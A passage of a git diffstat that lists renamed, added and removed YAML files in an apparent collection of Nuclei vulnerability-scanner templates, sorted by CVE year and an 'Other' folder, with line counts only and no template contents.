cve-2020-10124.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-10220.yaml | 22 + ...VE-2020-10547.yaml => cve-2020-10547.yaml} | 0 ...VE-2020-11034.yaml => cve-2020-11034.yaml} | 0 ...VE-2020-11529.yaml => cve-2020-11529.yaml} | 0 ...VE-2020-11546.yaml => cve-2020-11546.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-12116.yaml | 46 - nuclei-templates/CVE-2020/cve-2020-14408.yaml | 41 - nuclei-templates/CVE-2020/cve-2020-14750.yaml | 22 - ...VE-2020-14864.yaml => cve-2020-14864.yaml} | 0 ...VE-2020-14883.yaml => cve-2020-14883.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-15505.yaml | 42 + ...VE-2020-15920.yaml => cve-2020-15920.yaml} | 0 ...VE-2020-16270.yaml => cve-2020-16270.yaml} | 0 .../cve-2020-16920.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-16952.yaml | 40 - ...VE-2020-17456.yaml => cve-2020-17456.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-17505.yaml | 41 - nuclei-templates/CVE-2020/cve-2020-17519.yaml | 28 - ...VE-2020-17530.yaml => cve-2020-17530.yaml} | 0 ...VE-2020-18268.yaml => cve-2020-18268.yaml} | 0 ...VE-2020-19360.yaml => cve-2020-19360.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-20982.yaml | 35 - nuclei-templates/CVE-2020/cve-2020-2199.yaml | 20 +- nuclei-templates/CVE-2020/cve-2020-22208.yaml | 36 - nuclei-templates/CVE-2020/cve-2020-22210.yaml | 36 + nuclei-templates/CVE-2020/cve-2020-22211.yaml | 36 - ...VE-2020-24579.yaml => cve-2020-24579.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-24912.yaml | 43 - ...VE-2020-25780.yaml => cve-2020-25780.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-25864.yaml | 43 + ...VE-2020-26214.yaml => cve-2020-26214.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-26413.yaml | 50 + nuclei-templates/CVE-2020/cve-2020-28188.yaml | 33 - nuclei-templates/CVE-2020/cve-2020-29164.yaml | 27 - ...VE-2020-35598.yaml => cve-2020-35598.yaml} | 0 ...VE-2020-35736.yaml => cve-2020-35736.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-35846.yaml | 44 + nuclei-templates/CVE-2020/cve-2020-35848.yaml | 35 - ...VE-2020-36112.yaml => cve-2020-36112.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-36289.yaml | 32 + ...VE-2020-36365.yaml => cve-2020-36365.yaml} | 0 ...{CVE-2020-4038.yaml => cve-2020-4038.yaml} | 0 ...{CVE-2020-5775.yaml => cve-2020-5775.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-5777.yaml | 36 - ...{CVE-2020-5902.yaml => cve-2020-5902.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-6308.yaml | 27 + nuclei-templates/CVE-2020/cve-2020-7048.yaml | 58 - ...{CVE-2020-7209.yaml => cve-2020-7209.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-7980.yaml | 44 + ...{CVE-2020-8515.yaml => cve-2020-8515.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-8641.yaml | 32 - nuclei-templates/CVE-2020/cve-2020-8654.yaml | 41 - ...{CVE-2020-8813.yaml => cve-2020-8813.yaml} | 0 ...{CVE-2020-8982.yaml => cve-2020-8982.yaml} | 0 nuclei-templates/CVE-2020/cve-2020-9047.yaml | 66 - nuclei-templates/CVE-2020/cve-2020-9054.yaml | 40 - nuclei-templates/CVE-2020/cve-2020-9484.yaml | 40 - nuclei-templates/CVE-2020/cve-2020-9496.yaml | 44 - .../CVE-2020/cve-20200924a(1).yaml | 33 - ...{cve-2021-1497.yaml => CVE-2021-1497.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-1498.yaml | 42 - ...{cve-2021-1499.yaml => CVE-2021-1499.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-20038.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-20114.yaml | 34 + nuclei-templates/CVE-2021/CVE-2021-20123.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-20137.yaml | 53 - nuclei-templates/CVE-2021/CVE-2021-20167.yaml | 32 + nuclei-templates/CVE-2021/CVE-2021-21234.yaml | 40 + ...ve-2021-21307.yaml => CVE-2021-21307.yaml} | 0 ...ve-2021-21402.yaml => CVE-2021-21402.yaml} | 0 ...ve-2021-21479.yaml => CVE-2021-21479.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-21745.yaml | 50 - nuclei-templates/CVE-2021/CVE-2021-21799.yaml | 52 - nuclei-templates/CVE-2021/CVE-2021-21800.yaml | 53 + nuclei-templates/CVE-2021/CVE-2021-21801.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-21805.yaml | 57 + ...ve-2021-21881.yaml => CVE-2021-21881.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-21972.yaml | 33 + nuclei-templates/CVE-2021/CVE-2021-21985.yaml | 34 + nuclei-templates/CVE-2021/CVE-2021-22122.yaml | 32 + nuclei-templates/CVE-2021/CVE-2021-22873.yaml | 37 - nuclei-templates/CVE-2021/CVE-2021-22986.yaml | 57 + nuclei-templates/CVE-2021/CVE-2021-24139.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24148.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24166.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24213.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24226.yaml | 33 - nuclei-templates/CVE-2021/CVE-2021-24228.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24229.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24230.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24231.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24237.yaml | 35 + nuclei-templates/CVE-2021/CVE-2021-24276.yaml | 44 - nuclei-templates/CVE-2021/CVE-2021-24286.yaml | 51 - nuclei-templates/CVE-2021/CVE-2021-24291.yaml | 33 + nuclei-templates/CVE-2021/CVE-2021-24297.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24495.yaml | 39 - nuclei-templates/CVE-2021/CVE-2021-24499.yaml | 48 - nuclei-templates/CVE-2021/CVE-2021-24508.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24522.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24527.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24565.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24657.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24761.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24764.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24806.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24873.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24925.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-24948.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-24949.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-25017.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-25022.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-25040.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-25041.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-25070.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-25087.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-25089.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-25098.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-25281.yaml | 41 - ...ve-2021-26086.yaml => CVE-2021-26086.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-26475.yaml | 29 - ...ve-2021-26855.yaml => CVE-2021-26855.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-27132.yaml | 37 + nuclei-templates/CVE-2021/CVE-2021-27358.yaml | 40 + nuclei-templates/CVE-2021/CVE-2021-27561.yaml | 43 - ...ve-2021-28149.yaml => CVE-2021-28149.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-28151.yaml | 56 + ...ve-2021-29441.yaml => CVE-2021-29441.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-29490.yaml | 28 + nuclei-templates/CVE-2021/CVE-2021-29622.yaml | 25 - ...{cve-2021-3002.yaml => CVE-2021-3002.yaml} | 0 ...{cve-2021-3019.yaml => CVE-2021-3019.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-31537.yaml | 33 + ...ve-2021-32172.yaml => CVE-2021-32172.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-32682.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-3377.yaml | 35 + nuclei-templates/CVE-2021/CVE-2021-33904.yaml | 36 - nuclei-templates/CVE-2021/CVE-2021-34620.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-34623.yaml | 58 + ...ve-2021-34805.yaml => CVE-2021-34805.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-35265.yaml | 39 + ...ve-2021-35587.yaml => CVE-2021-35587.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-36450.yaml | 73 + nuclei-templates/CVE-2021/CVE-2021-36749.yaml | 35 - nuclei-templates/CVE-2021/CVE-2021-37859.yaml | 27 + nuclei-templates/CVE-2021/CVE-2021-38751.yaml | 42 - nuclei-templates/CVE-2021/CVE-2021-39226.yaml | 31 - nuclei-templates/CVE-2021/CVE-2021-39316.yaml | 32 + nuclei-templates/CVE-2021/CVE-2021-39501.yaml | 28 - nuclei-templates/CVE-2021/CVE-2021-40149.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-40438.yaml | 29 - nuclei-templates/CVE-2021/CVE-2021-40822.yaml | 59 + nuclei-templates/CVE-2021/CVE-2021-40859.yaml | 41 + ...ve-2021-40960.yaml => CVE-2021-40960.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41266.yaml | 46 + nuclei-templates/CVE-2021/CVE-2021-41291.yaml | 27 - nuclei-templates/CVE-2021/CVE-2021-41349.yaml | 42 + ...ve-2021-41381.yaml => CVE-2021-41381.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-41653.yaml | 48 + nuclei-templates/CVE-2021/CVE-2021-41951.yaml | 36 - nuclei-templates/CVE-2021/CVE-2021-42192.yaml | 90 - nuclei-templates/CVE-2021/CVE-2021-42551.yaml | 47 - nuclei-templates/CVE-2021/CVE-2021-42566.yaml | 39 + nuclei-templates/CVE-2021/CVE-2021-42567.yaml | 42 + nuclei-templates/CVE-2021/CVE-2021-43287.yaml | 28 + nuclei-templates/CVE-2021/CVE-2021-43495.yaml | 27 + nuclei-templates/CVE-2021/CVE-2021-43778.yaml | 30 - nuclei-templates/CVE-2021/CVE-2021-43798.yaml | 32 - nuclei-templates/CVE-2021/CVE-2021-4392.yaml | 58 + nuclei-templates/CVE-2021/CVE-2021-4417.yaml | 58 - nuclei-templates/CVE-2021/CVE-2021-44515.yaml | 52 - ...ve-2021-44529.yaml => CVE-2021-44529.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-44848.yaml | 36 - nuclei-templates/CVE-2021/CVE-2021-45043.yaml | 38 - nuclei-templates/CVE-2021/CVE-2021-45428.yaml | 56 + ...ve-2021-45967.yaml => CVE-2021-45967.yaml} | 0 ...ve-2021-46005.yaml => CVE-2021-46005.yaml} | 0 ...ve-2021-46381.yaml => CVE-2021-46381.yaml} | 0 nuclei-templates/CVE-2021/CVE-2021-46422.yaml | 54 - nuclei-templates/CVE-2021/CVE-2021-46424.yaml | 51 - nuclei-templates/CVE-2021/CVE-2021-46889.yaml | 58 + nuclei-templates/CVE-2021/cve-2021-1498.yaml | 42 + ...VE-2021-20031.yaml => cve-2021-20031.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-20038.yaml | 42 + ...VE-2021-20092.yaml => cve-2021-20092.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-20114.yaml | 34 - nuclei-templates/CVE-2021/cve-2021-20123.yaml | 48 - nuclei-templates/CVE-2021/cve-2021-20137.yaml | 40 + ...VE-2021-20150.yaml => cve-2021-20150.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-20167.yaml | 35 - nuclei-templates/CVE-2021/cve-2021-21234.yaml | 40 - ...VE-2021-21287.yaml => cve-2021-21287.yaml} | 0 ...VE-2021-21311.yaml => cve-2021-21311.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-21745.yaml | 39 + nuclei-templates/CVE-2021/cve-2021-21799.yaml | 37 + nuclei-templates/CVE-2021/cve-2021-21800.yaml | 37 - nuclei-templates/CVE-2021/cve-2021-21801.yaml | 32 + nuclei-templates/CVE-2021/cve-2021-21805.yaml | 39 - nuclei-templates/CVE-2021/cve-2021-21972.yaml | 33 - ...VE-2021-21975.yaml => cve-2021-21975.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-21985.yaml | 34 - nuclei-templates/CVE-2021/cve-2021-22122.yaml | 34 - nuclei-templates/CVE-2021/cve-2021-22873.yaml | 30 + nuclei-templates/CVE-2021/cve-2021-22986.yaml | 57 - nuclei-templates/CVE-2021/cve-2021-24210.yaml | 28 - nuclei-templates/CVE-2021/cve-2021-24406.yaml | 20 - nuclei-templates/CVE-2021/cve-2021-25281.yaml | 39 + ...VE-2021-25864.yaml => cve-2021-25864.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-26475.yaml | 24 + ...VE-2021-26598.yaml => cve-2021-26598.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-27132.yaml | 29 - nuclei-templates/CVE-2021/cve-2021-27358.yaml | 42 - nuclei-templates/CVE-2021/cve-2021-27561.yaml | 43 + nuclei-templates/CVE-2021/cve-2021-27905.yaml | 39 +- ...VE-2021-28073.yaml => cve-2021-28073.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-28151.yaml | 56 - ...VE-2021-28164.yaml => cve-2021-28164.yaml} | 0 ...VE-2021-28918.yaml => cve-2021-28918.yaml} | 0 ...VE-2021-29203.yaml => cve-2021-29203.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-29490.yaml | 31 - nuclei-templates/CVE-2021/cve-2021-29622.yaml | 20 + ...VE-2021-30497.yaml => cve-2021-30497.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-31537.yaml | 25 - ...VE-2021-31581.yaml => cve-2021-31581.yaml} | 0 ...VE-2021-31862.yaml => cve-2021-31862.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-32682.yaml | 47 + ...VE-2021-32820.yaml => cve-2021-32820.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-3377.yaml | 28 - nuclei-templates/CVE-2021/cve-2021-33904.yaml | 25 + nuclei-templates/CVE-2021/cve-2021-35265.yaml | 41 - nuclei-templates/CVE-2021/cve-2021-36450.yaml | 55 - nuclei-templates/CVE-2021/cve-2021-36749.yaml | 35 + ...VE-2021-37580.yaml => cve-2021-37580.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-37859.yaml | 27 - ...VE-2021-38540.yaml => cve-2021-38540.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-38647.yaml | 68 - nuclei-templates/CVE-2021/cve-2021-38751.yaml | 41 + nuclei-templates/CVE-2021/cve-2021-39226.yaml | 34 + nuclei-templates/CVE-2021/cve-2021-39501.yaml | 30 + nuclei-templates/CVE-2021/cve-2021-40149.yaml | 35 - nuclei-templates/CVE-2021/cve-2021-40438.yaml | 30 + nuclei-templates/CVE-2021/cve-2021-40822.yaml | 45 - nuclei-templates/CVE-2021/cve-2021-40859.yaml | 43 - nuclei-templates/CVE-2021/cve-2021-41266.yaml | 49 - nuclei-templates/CVE-2021/cve-2021-41291.yaml | 27 + nuclei-templates/CVE-2021/cve-2021-41349.yaml | 45 - nuclei-templates/CVE-2021/cve-2021-41653.yaml | 52 - nuclei-templates/CVE-2021/cve-2021-41773.yaml | 18 + nuclei-templates/CVE-2021/cve-2021-41951.yaml | 38 + ...VE-2021-42063.yaml => cve-2021-42063.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-42192.yaml | 82 + nuclei-templates/CVE-2021/cve-2021-42551.yaml | 49 + nuclei-templates/CVE-2021/cve-2021-42566.yaml | 42 - nuclei-templates/CVE-2021/cve-2021-42567.yaml | 44 - ...VE-2021-43062.yaml => cve-2021-43062.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-43287.yaml | 28 - nuclei-templates/CVE-2021/cve-2021-43495.yaml | 29 - nuclei-templates/CVE-2021/cve-2021-43778.yaml | 33 + nuclei-templates/CVE-2021/cve-2021-43798.yaml | 37 + nuclei-templates/CVE-2021/cve-2021-44228.yaml | 48 - nuclei-templates/CVE-2021/cve-2021-44515.yaml | 44 + nuclei-templates/CVE-2021/cve-2021-44848.yaml | 38 + nuclei-templates/CVE-2021/cve-2021-45043.yaml | 40 + nuclei-templates/CVE-2021/cve-2021-45096.yaml | 82 +- ...VE-2021-45380.yaml => cve-2021-45380.yaml} | 0 nuclei-templates/CVE-2021/cve-2021-45428.yaml | 48 - nuclei-templates/CVE-2021/cve-2021-46422.yaml | 45 + nuclei-templates/CVE-2021/cve-2021-46424.yaml | 44 + nuclei-templates/CVE-2022/CVE-2022-0141.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-0142.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-0250.yaml | 58 + ...{cve-2022-0281.yaml => CVE-2022-0281.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0320.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-0328.yaml | 58 - ...{cve-2022-0378.yaml => CVE-2022-0378.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0437.yaml | 51 + ...{cve-2022-0482.yaml => CVE-2022-0482.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0513.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-0540.yaml | 50 - nuclei-templates/CVE-2022/CVE-2022-0543.yaml | 48 - nuclei-templates/CVE-2022/CVE-2022-0640.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-0681.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-0694.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-0770.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-0870.yaml | 81 - nuclei-templates/CVE-2022/CVE-2022-0963.yaml | 75 - nuclei-templates/CVE-2022/CVE-2022-1166.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-1209.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-1281.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-1282.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-1815.yaml | 46 + nuclei-templates/CVE-2022/CVE-2022-1895.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-1985.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-2167.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-21705.yaml | 116 - nuclei-templates/CVE-2022/CVE-2022-2260.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-2290.yaml | 60 - nuclei-templates/CVE-2022/CVE-2022-22972.yaml | 113 - ...ve-2022-23134.yaml => CVE-2022-23134.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-23178.yaml | 35 - nuclei-templates/CVE-2022/CVE-2022-2362.yaml | 58 + ...ve-2022-23881.yaml => CVE-2022-23881.yaml} | 0 ...ve-2022-23944.yaml => CVE-2022-23944.yaml} | 0 .../CVE-2022-24259.yaml} | 0 ...ve-2022-24288.yaml => CVE-2022-24288.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-2461.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-2486.yaml | 51 - nuclei-templates/CVE-2022/CVE-2022-2488.yaml | 51 + nuclei-templates/CVE-2022/CVE-2022-24899.yaml | 51 - nuclei-templates/CVE-2022/CVE-2022-24900.yaml | 47 + nuclei-templates/CVE-2022/CVE-2022-25306.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-25307.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-2532.yaml | 58 - ...ve-2022-25323.yaml => CVE-2022-25323.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-2536.yaml | 60 + nuclei-templates/CVE-2022/CVE-2022-2552.yaml | 58 - ...ve-2022-26135.yaml => CVE-2022-26135.yaml} | 0 ...ve-2022-26148.yaml => CVE-2022-26148.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-26352.yaml | 57 - nuclei-templates/CVE-2022/CVE-2022-27927.yaml | 52 - nuclei-templates/CVE-2022/CVE-2022-28219.yaml | 67 + nuclei-templates/CVE-2022/CVE-2022-2846.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-29014.yaml | 49 - nuclei-templates/CVE-2022/CVE-2022-29299.yaml | 50 - nuclei-templates/CVE-2022/CVE-2022-29303.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-29464.yaml | 56 + nuclei-templates/CVE-2022/CVE-2022-29548.yaml | 55 - nuclei-templates/CVE-2022/CVE-2022-30073.yaml | 80 - nuclei-templates/CVE-2022/CVE-2022-30525.yaml | 53 + nuclei-templates/CVE-2022/CVE-2022-32022.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-32025.yaml | 62 - ...ve-2022-32159.yaml => CVE-2022-32159.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-32409.yaml | 48 - nuclei-templates/CVE-2022/CVE-2022-33174.yaml | 60 - nuclei-templates/CVE-2022/CVE-2022-34046.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-34047.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-34048.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-3463.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-35416.yaml | 57 - nuclei-templates/CVE-2022/CVE-2022-3600.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-3846.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-3852.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-4120.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-45808.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-4971.yaml | 59 - nuclei-templates/CVE-2022/cve-2022-0437.yaml | 51 - nuclei-templates/CVE-2022/cve-2022-0540.yaml | 38 + nuclei-templates/CVE-2022/cve-2022-0543.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-0870.yaml | 46 + ...{CVE-2022-0954.yaml => cve-2022-0921.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-0963.yaml | 64 + nuclei-templates/CVE-2022/cve-2022-1815.yaml | 31 - nuclei-templates/CVE-2022/cve-2022-21705.yaml | 107 + ...VE-2022-22536.yaml => cve-2022-22536.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-2290.yaml | 43 + nuclei-templates/CVE-2022/cve-2022-22965.yaml | 53 +- nuclei-templates/CVE-2022/cve-2022-22972.yaml | 106 + nuclei-templates/CVE-2022/cve-2022-23178.yaml | 37 + ...VE-2022-23347.yaml => cve-2022-23347.yaml} | 0 ...VE-2022-23779.yaml => cve-2022-23779.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-2486.yaml | 34 + nuclei-templates/CVE-2022/cve-2022-2488.yaml | 34 - nuclei-templates/CVE-2022/cve-2022-24899.yaml | 39 + nuclei-templates/CVE-2022/cve-2022-24900.yaml | 35 - ...VE-2022-25369.yaml => cve-2022-25369.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-26352.yaml | 44 + nuclei-templates/CVE-2022/cve-2022-27927.yaml | 41 + nuclei-templates/CVE-2022/cve-2022-28219.yaml | 57 - nuclei-templates/CVE-2022/cve-2022-29014.yaml | 36 + nuclei-templates/CVE-2022/cve-2022-29299.yaml | 42 + nuclei-templates/CVE-2022/cve-2022-29303.yaml | 36 + nuclei-templates/CVE-2022/cve-2022-29464.yaml | 48 - nuclei-templates/CVE-2022/cve-2022-29548.yaml | 42 + nuclei-templates/CVE-2022/cve-2022-30073.yaml | 63 + nuclei-templates/CVE-2022/cve-2022-30525.yaml | 43 - nuclei-templates/CVE-2022/cve-2022-32022.yaml | 44 - nuclei-templates/CVE-2022/cve-2022-32025.yaml | 46 + nuclei-templates/CVE-2022/cve-2022-32409.yaml | 31 + nuclei-templates/CVE-2022/cve-2022-33174.yaml | 47 + nuclei-templates/CVE-2022/cve-2022-34046.yaml | 34 - nuclei-templates/CVE-2022/cve-2022-34047.yaml | 34 + nuclei-templates/CVE-2022/cve-2022-34048.yaml | 41 + nuclei-templates/CVE-2022/cve-2022-35416.yaml | 39 + nuclei-templates/CVE-2023/CVE-2023-0058.yaml | 58 - nuclei-templates/CVE-2023/CVE-2023-0403.yaml | 58 + .../CVE-2023-0552.yaml | 8 +- nuclei-templates/CVE-2023/CVE-2023-0899.yaml | 58 - nuclei-templates/CVE-2023/CVE-2023-1282.yaml | 58 - nuclei-templates/CVE-2023/CVE-2023-1912.yaml | 58 + nuclei-templates/CVE-2023/CVE-2023-23752.yaml | 35 + nuclei-templates/CVE-2023/CVE-2023-2488.yaml | 58 + nuclei-templates/CVE-2023/CVE-2023-25194.yaml | 99 - nuclei-templates/CVE-2023/CVE-2023-3134.yaml | 58 + nuclei-templates/CVE-2023/CVE-2023-34020.yaml | 36 + nuclei-templates/CVE-2023/CVE-2023-3452.yaml | 64 - nuclei-templates/CVE-2023/CVE-2023-3836.yaml | 68 - nuclei-templates/CVE-2023/CVE-2023-40600.yaml | 58 - nuclei-templates/CVE-2023/CVE-2023-4620.yaml | 58 + nuclei-templates/CVE-2023/CVE-2023-47684.yaml | 58 + nuclei-templates/CVE-2023/CVE-2023-49442.yaml | 27 - nuclei-templates/CVE-2023/CVE-2023-5307.yaml | 58 + nuclei-templates/CVE-2023/CVE-2023-5604.yaml | 58 + nuclei-templates/CVE-2023/CVE-2023-6627.yaml | 58 + nuclei-templates/CVE-2023/CVE-2023-7200.yaml | 58 + nuclei-templates/CVE-2023/Cve-2023-23752.yaml | 65 - nuclei-templates/CVE-2023/cve-2023-28432.yaml | 60 - nuclei-templates/CVE-2024/CVE-2024-0233.yaml | 58 + nuclei-templates/CVE-2024/CVE-2024-0236.yaml | 58 + nuclei-templates/CVE-2024/CVE-2024-0237.yaml | 58 + nuclei-templates/CVE-2024/CVE-2024-0324.yaml | 58 - nuclei-templates/CVE-2024/CVE-2024-10400.yaml | 68 - nuclei-templates/CVE-2024/CVE-2024-11303.yaml | 43 + nuclei-templates/CVE-2024/CVE-2024-1561.yaml | 66 + nuclei-templates/CVE-2024/CVE-2024-1728.yaml | 42 + nuclei-templates/CVE-2024/CVE-2024-23897.yaml | 56 + nuclei-templates/CVE-2024/CVE-2024-2879.yaml | 58 + nuclei-templates/CVE-2024/CVE-2024-3495.yaml | 57 - nuclei-templates/CVE-2024/CVE-2024-43360.yaml | 44 + nuclei-templates/CVE-2024/CVE-2024-4382.yaml | 59 - nuclei-templates/CVE-2024/CVE-2024-45216.yaml | 2 +- nuclei-templates/CVE-2024/CVE-2024-5932.yaml | 151 - nuclei-templates/CVE-2024/CVE-2024-8529.yaml | 59 + nuclei-templates/CVE-2024/CVE-2024-8859.yaml | 100 + nuclei-templates/CVE-2024/CVE-2024-9156.yaml | 59 - nuclei-templates/CVE-2024/cve-2024-23897.yaml | 34 - ...{CVE-2024-3400.yaml => cve-2024-3400.yaml} | 0 ...{CVE-2024-6966.yaml => cve-2024-6966.yaml} | 0 nuclei-templates/Other/0xlfi3.yaml | 30 - ...linux-lfi-fuzzing.yaml => 0xlfifuzz1.yaml} | 0 nuclei-templates/Other/10026656.yaml | 21 + nuclei-templates/Other/1013877238.yaml | 21 - nuclei-templates/Other/1017313682.yaml | 19 + nuclei-templates/Other/1021548475.yaml | 19 + nuclei-templates/Other/1037743998.yaml | 20 + nuclei-templates/Other/1046762834.yaml | 19 + nuclei-templates/Other/1046994046.yaml | 24 + nuclei-templates/Other/1052768784.yaml | 21 - nuclei-templates/Other/1059851355.yaml | 20 + nuclei-templates/Other/1069194709.yaml | 23 + nuclei-templates/Other/1094100874.yaml | 21 - nuclei-templates/Other/1104276962.yaml | 2 +- nuclei-templates/Other/1149349278.yaml | 20 - nuclei-templates/Other/1160329386.yaml | 24 - .../Other/{613773972.yaml => 116146157.yaml} | 0 nuclei-templates/Other/1193598862.yaml | 20 - nuclei-templates/Other/1195423503.yaml | 21 - nuclei-templates/Other/1198614981.yaml | 20 - nuclei-templates/Other/1204339477.yaml | 24 - nuclei-templates/Other/120810229.yaml | 19 - .../{4116145651.yaml => 1213151196.yaml} | 0 nuclei-templates/Other/1218581585.yaml | 19 - nuclei-templates/Other/1225742488.yaml | 20 + nuclei-templates/Other/1229524994.yaml | 20 - nuclei-templates/Other/123088729.yaml | 19 - .../{1764111933.yaml => 1264087241.yaml} | 0 nuclei-templates/Other/1292911140.yaml | 23 + nuclei-templates/Other/1302304737.yaml | 19 - nuclei-templates/Other/1310750304.yaml | 21 - nuclei-templates/Other/1316215977.yaml | 20 + nuclei-templates/Other/1342746263.yaml | 21 - nuclei-templates/Other/1350840394.yaml | 21 + .../Other/{398072536.yaml => 1366049.yaml} | 0 nuclei-templates/Other/1372479638.yaml | 21 + nuclei-templates/Other/1400097940.yaml | 4 +- nuclei-templates/Other/1403212348.yaml | 21 + .../Other/{167363359.yaml => 1408359568.yaml} | 0 .../{1668347864.yaml => 1408482974.yaml} | 0 nuclei-templates/Other/1423025940.yaml | 20 - nuclei-templates/Other/1425636744.yaml | 24 + nuclei-templates/Other/1427908048.yaml | 20 - nuclei-templates/Other/1492052638.yaml | 19 + 